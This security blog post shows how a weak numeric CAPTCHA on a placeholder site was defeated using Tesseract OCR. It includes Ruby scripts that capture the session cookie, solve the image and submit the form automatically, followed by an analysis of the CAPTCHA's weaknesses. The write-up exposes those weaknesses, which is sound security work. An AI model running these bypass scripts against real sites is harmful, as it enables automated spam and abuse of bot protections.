
Breaking a Weak CAPTCHA Implementation
So let's get started. Here is one sample captcha obtained from the website.
My first thought was to try the free “OCR to text” conversion service provided by the guys at Free-Ocr. I uploaded a few captchas to the website, and it successfully solved almost all of them. One solved captcha is shown below.
Now I knew that the captcha could be solved, and I needed a way to automate the process. I turned to Tesseract to do that for me. Tesseract enjoys the reputation of being one of the most accurate open source OCR engines available.
Tesseract was downloaded and installed on a Windows box. The page requiring captcha input was sourcing its captchas from a PHP script on the web server. Let's say its path is http://www.test.com/get_captcha.php. The following script downloaded a sample captcha, stored it on the local file system, and then solved it.
require 'net/http'

# Path to the Tesseract executable on the Windows box
tesseract = 'C:\Tesseract-OCR\tesseract.exe'
q = Net::HTTP.new('www.test.com', 80)

# Download a new captcha
r = q.get("/get_captcha.php")
File.open("captcha.bmp", 'wb') do |f|
  f.write r.body  # write the raw bytes; puts would append a newline to the image
end

# Solve the captcha; Tesseract stores its output in captcha.txt
system("#{tesseract} captcha.bmp captcha")
With the captcha solved, submitting the form automatically came down to the following steps:
- GET the /home.php page and capture the value of PHPSESSIONID.
- Retrieve a captcha by accessing /get_captcha.php while using the captured PHPSESSIONID.
- Solve the captcha locally.
- POST the form fields along with PHPSESSIONID and the captcha value.
require 'net/http'

tesseract = 'C:\Tesseract-OCR\tesseract.exe'
q = Net::HTTP.new('www.test.com', 80)

# GET /home.php and capture the PHPSESSIONID value from the Set-Cookie header
r = q.get("/home.php")
r['set-cookie'] =~ /PHPSESSIONID=(.*?);/
hdr = {'Cookie' => "PHPSESSIONID=#{$1}"}

# Get a captcha associated with the valid PHPSESSIONID and solve it
r = q.get("/get_captcha.php", hdr)
File.open("captcha.bmp", 'wb') do |f|
  f.write r.body  # write the raw bytes; puts would append a newline to the image
end
system("#{tesseract} captcha.bmp captcha")

# Retrieve the captcha value and POST the form details along with the valid PHPSESSIONID
captcha = File.read("captcha.txt").strip
q.post('/save_details.php', "fname=gursev&lname=kalra&captcha=#{captcha}", hdr)
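OCR does not get every image right, so it can help to sanity-check the recognized text before posting it. The helper below is only a sketch: plausible_captcha? is a hypothetical name, and it assumes a valid captcha is a non-empty string of digits, which matches the numerals-only captchas seen on this site.

```ruby
# Sketch: sanity-check OCR output before submitting it.
# Assumption: a valid captcha is a non-empty string made up of digits only.
def plausible_captcha?(text)
  !text.nil? && text.strip.match?(/\A\d+\z/)
end

# Hypothetical usage with the script above:
#   captcha = File.read("captcha.txt").strip
#   post the form only if plausible_captcha?(captcha) is true,
#   otherwise request a fresh captcha and solve that one instead.
```

Rejecting implausible output locally avoids spending a request on a submission that is certain to fail.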
A few other weaknesses were observed in the captcha implementation:
- Captchas contained only numerals, and hence had fewer possible combinations.
- Out of 100 captchas, around 4 duplicates were identified. That's around 4% of the total captchas issued.
- Captchas had an uneven character distribution, with 4s and 5s getting the largest share of captcha characters. The distribution formed a bell curve with a peak at 4 and 5.
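Observations like these can be checked with a short tally over a batch of solved captchas. The following is a minimal sketch, not the script used for the original analysis: captcha_stats and keyspace are hypothetical helpers, the sample values are made up, and the captcha length of 4 is an assumption for illustration only.

```ruby
# Summarize a batch of solved captcha strings.
def captcha_stats(solutions)
  # Each repeat of an already-seen value counts as one duplicate.
  duplicates = solutions.size - solutions.uniq.size
  # Tally how often each character appears across all solutions.
  digit_counts = Hash.new(0)
  solutions.each { |s| s.each_char { |c| digit_counts[c] += 1 } }
  {
    duplicates: duplicates,
    duplicate_rate: duplicates.to_f / solutions.size,
    digit_counts: digit_counts
  }
end

# Number of possible captchas for a given alphabet size and length.
def keyspace(alphabet_size, length)
  alphabet_size**length
end

sample = %w[4455 1234 4455 5546] # made-up values, not real captchas
stats = captcha_stats(sample)
puts "duplicates: #{stats[:duplicates]} (#{(stats[:duplicate_rate] * 100).round(1)}%)"
stats[:digit_counts].sort.each { |digit, n| puts "#{digit}: #{n}" }

# Assumed length of 4: digits only versus digits plus case-insensitive letters.
puts "digits only: #{keyspace(10, 4)}"
puts "digits and letters: #{keyspace(36, 4)}"
```

Feeding the contents of each captcha.txt into captcha_stats would give the duplicate rate and per-digit counts for a real sample.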
*** This is a Security Bloggers Network syndicated blog from Random Security authored by Gursev Singh Kalra. Read the original post at: http://gursevkalra.blogspot.com/2011/03/breaking-weak-captcha-implementation.html